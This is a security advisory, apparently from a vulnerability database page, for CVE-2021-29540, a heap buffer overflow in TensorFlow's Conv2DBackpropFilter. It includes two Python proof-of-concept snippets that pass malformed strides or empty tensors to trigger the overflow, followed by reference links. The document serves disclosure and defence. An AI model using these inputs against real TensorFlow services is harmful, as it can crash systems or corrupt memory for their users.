CVE-2021-29540: Heap buffer overflow in `Conv2DBackpropFilter`
(updated )
An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter
:
import tensorflow as tf
input_tensor = tf.constant([386.078431372549, 386.07843139643234],
shape=[1, 1, 1, 2], dtype=tf.float32)
filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32)
out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1],
dtype=tf.float32)
tf.raw_ops.Conv2DBackpropFilter(
input=input_tensor,
filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=[1, 66, 49, 1],
use_cudnn_on_gpu=True,
padding='VALID',
explicit_paddings=[],
data_format='NHWC',
dilations=[1, 1, 1, 1]
)
Alternatively, passing empty tensors also results in similar behavior:
import tensorflow as tf
input_tensor = tf.constant([], shape=[0, 1, 1, 5], dtype=tf.float32)
filter_sizes = tf.constant([3, 8, 1, 1], shape=[4], dtype=tf.int32)
out_backprop = tf.constant([], shape=[0, 1, 1, 1], dtype=tf.float32)
tf.raw_ops.Conv2DBackpropFilter(
input=input_tensor,
filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=[1, 66, 49, 1],
use_cudnn_on_gpu=True,
padding='VALID',
explicit_paddings=[],
data_format='NHWC',
dilations=[1, 1, 1, 1]
)
References
- github.com/advisories/GHSA-xgc3-m89p-vr3x
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-468.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-666.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-177.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/c570e2ecfc822941335ad48f6e10df4e21f11c96
- github.com/tensorflow/tensorflow/security/advisories/GHSA-xgc3-m89p-vr3x
- nvd.nist.gov/vuln/detail/CVE-2021-29540
Detect and mitigate CVE-2021-29540 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →